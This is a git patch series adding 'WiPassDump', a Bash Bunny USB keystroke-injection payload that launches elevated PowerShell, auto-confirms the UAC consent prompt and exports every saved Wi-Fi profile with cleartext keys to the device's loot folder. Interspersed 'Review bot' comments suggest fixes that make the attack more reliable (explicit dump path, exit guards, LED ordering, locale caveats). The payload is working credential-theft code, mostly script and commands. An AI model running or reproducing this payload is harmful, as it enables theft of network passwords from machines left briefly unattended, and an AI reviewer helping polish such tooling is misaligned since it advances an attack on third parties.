From c10328832034d3916c424ff934e5713bc12db859 Mon Sep 17 00:00:00 2001
From: samdeg555
Date: Sun, 12 Mar 2017 12:24:28 -0400
Subject: [PATCH 1/4] WiPassDump

Runs powershell as Administrator, bypasses UAC and dumps cleartext Wi-Fi passwords and infos to the Bash Bunny.

---
 payloads/library/WiPassDump/a.cmd | 6 +++
 payloads/library/WiPassDump/payload.txt | 55 +++++++++++++++++++++++++
 payloads/library/WiPassDump/readme.md | 26 ++++++++++++
 3 files changed, 87 insertions(+)
 create mode 100644 payloads/library/WiPassDump/a.cmd
 create mode 100644 payloads/library/WiPassDump/payload.txt
 create mode 100644 payloads/library/WiPassDump/readme.md

diff --git a/payloads/library/WiPassDump/a.cmd b/payloads/library/WiPassDump/a.cmd
new file mode 100644
index 0000000..858b01e
--- /dev/null
+++ b/payloads/library/WiPassDump/a.cmd
@@ -0,0 +1,6 @@
+REM Go to dump directory
+cd /d %~dp0
+cd ../../loot/WiPassDump/
+
+REM Dump saved Wi-Fi infos
+netsh wlan export profile key=clear
\ No newline at end of file
diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt
new file mode 100644
index 0000000..6a25411
--- /dev/null
+++ b/payloads/library/WiPassDump/payload.txt
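Review bot: Both `cd` lines run unchecked, so if the relative hop to `../../loot/WiPassDump/` fails for any reason, `netsh wlan export profile key=clear` writes every saved profile, cleartext key included, into whatever the current directory happens to be at that moment. Passing the destination explicitly removes the dependency on the working directory: `netsh wlan export profile key=clear folder="%~dp0..\..\loot\WiPassDump"`, or at least `cd /d "%~dp0..\..\loot\WiPassDump" || exit /b 1` before the export. The payload side does create that directory with `mkdir -p` first, so this is a guard against a silent mis-drop rather than a reproducible failure.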
@@ -0,0 +1,55 @@
+#!/bin/bash
+#
+# Title: WiPassDump
+# Author: Dax
+# Version: 1.0
+# Target: Windows
+#
+# Runs powershell as Administrator
+# Bypasses UAC
+# Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny
+#
+
+LED R 200
+
+ATTACKMODE HID STORAGE
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+# Set language accordingly
+Q SET_LANGUAGE ca
+
+# Create directory to dump infos
+mkdir -p /root/udisk/loot/WiPassDump
+
+LED B 200
+
+# Launch powershell as admin
+Q GUI r
+Q DELAY 100
+Q STRING powershell Start-Process powershell -Verb runAs
+Q ENTER
+
+# Bypass UAC
+Q DELAY 3000
+Q ALT o
+Q ENTER
+Q DELAY 500
+
+# Start a.cmd
+Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/'
+Q STRING $SWITCH_POSITION
+Q STRING '/a.cmd'"'"')'
+Q ENTER
+
+# Wait for a.cmd to finish and exit
+Q DELAY 3000
+Q STRING exit
+Q ENTER
+
+LED R B 500
+sync
+ATTACKMODE STORAGE
+
+LED G
\ No newline at end of file
diff --git a/payloads/library/WiPassDump/readme.md b/payloads/library/WiPassDump/readme.md
new file mode 100644
index 0000000..b744bf0
--- /dev/null
+++ b/payloads/library/WiPassDump/readme.md
@@ -0,0 +1,26 @@
+# WiPassDump for Bash Bunnys
+
+* Author: Dax
+* Version: Version 1.0
+* Target: Windows
+
+## Description
+
+Dumps saved Wi-Fi infos including clear text passwords to the bash bunny
+Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder.
+
+## Configuration
+
+None needed.
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Red (blinking) | Setting up |
+| Blue (blinking) | Attack running |
+| Purple (blinking) | Almost done (cleaning up) |
+| Green | Attack Complete |
+
+## Discussion
+None yet.
\ No newline at end of file
From 9723480f9b3a91d13a32d90699bd7c81d2c575d5 Mon Sep 17 00:00:00 2001
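Review bot: The `# Bypass UAC` step (`Q ALT o` then `Q ENTER`) does not bypass UAC; it answers the consent prompt raised by `Start-Process powershell -Verb runAs` with a fixed keystroke, which presumably only works when the logged-on user is already a local administrator and the confirm button's accelerator is `o` in the target's UI language. Nothing checks that an elevated window actually appeared, so on a standard-user target (credential prompt instead of consent) or a different locale the `gwmi win32_volume` invocation and `exit` are typed into whatever window has focus. The hard-coded `Q SET_LANGUAGE ca` carries the same locale assumption, and the readme's "Configuration: None needed" should call it out. Suggest rewording the comment to `# Accept the UAC consent prompt (needs an admin user; ALT+o accelerator is locale-specific)` and quoting the expansion as `Q STRING "$SWITCH_POSITION"`.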
From: samdeg555
Date: Sun, 12 Mar 2017 12:26:07 -0400
Subject: [PATCH 2/4] Update payload.txt

---
 payloads/library/WiPassDump/payload.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt
index 6a25411..68830e8 100644
--- a/payloads/library/WiPassDump/payload.txt
+++ b/payloads/library/WiPassDump/payload.txt
@@ -1,7 +1,7 @@
 #!/bin/bash
 #
 # Title: WiPassDump
-# Author: Dax
+# Author: samdeg555
 # Version: 1.0
 # Target: Windows
 #
@@ -52,4 +52,4 @@ LED R B 500
 sync
 ATTACKMODE STORAGE
 
-LED G
\ No newline at end of file
+LED G
From cb0948a56e28e43404b869d9213d5754af94e041 Mon Sep 17 00:00:00 2001
From: samdeg555
Date: Sun, 12 Mar 2017 12:26:36 -0400
Subject: [PATCH 3/4] Update readme.md

---
 payloads/library/WiPassDump/readme.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/payloads/library/WiPassDump/readme.md b/payloads/library/WiPassDump/readme.md
index b744bf0..72412ab 100644
--- a/payloads/library/WiPassDump/readme.md
+++ b/payloads/library/WiPassDump/readme.md
@@ -1,6 +1,6 @@
 # WiPassDump for Bash Bunnys
 
-* Author: Dax
+* Author: samdeg555
 * Version: Version 1.0
 * Target: Windows
 
@@ -23,4 +23,4 @@ None needed.
 | Green | Attack Complete |
 
 ## Discussion
-None yet.
\ No newline at end of file
+None yet.
From b0a130f96ae1bab28b0e785ea83118f8508e8619 Mon Sep 17 00:00:00 2001
From: samdeg555
Date: Sun, 12 Mar 2017 12:52:56 -0400
Subject: [PATCH 4/4] Update payload.txt

---
 payloads/library/WiPassDump/payload.txt | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt
index 68830e8..c141d94 100644
--- a/payloads/library/WiPassDump/payload.txt
+++ b/payloads/library/WiPassDump/payload.txt
@@ -12,7 +12,8 @@
 
 LED R 200
 
-ATTACKMODE HID STORAGE
+# Create directory to dump infos
+mkdir -p /root/udisk/loot/WiPassDump
 
 # Source bunny_helpers.sh to get environment variable SWITCH_POSITION
 source bunny_helpers.sh
@@ -20,8 +21,7 @@ source bunny_helpers.sh
 # Set language accordingly
 Q SET_LANGUAGE ca
 
-# Create directory to dump infos
-mkdir -p /root/udisk/loot/WiPassDump
+ATTACKMODE HID STORAGE
 
 LED B 200
 
@@ -44,12 +44,13 @@ Q STRING '/a.cmd'"'"')'
 Q ENTER
 
 # Wait for a.cmd to finish and exit
+
+LED R B 500
+
 Q DELAY 3000
 Q STRING exit
 Q ENTER
 
-LED R B 500
 sync
-ATTACKMODE STORAGE
 
 LED G
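Review bot: In the last hunk, moving `LED R B 500` above `Q DELAY 3000` lights the purple "almost done" state before a.cmd has been given its time to finish, and it strands the `# Wait for a.cmd to finish and exit` comment two lines away from the delay it describes; the readme's LED table still documents purple as clean-up. Removing `ATTACKMODE STORAGE` also leaves the device enumerated as a keyboard after `LED G`, which is presumably a wider exposure window than the previous version and deserves a comment if intentional. Suggest ordering `Q ENTER`, then `LED R B 500`, then `sync`, or at minimum changing the comment to `# Signal clean-up, then give a.cmd time to finish before leaving the shell`.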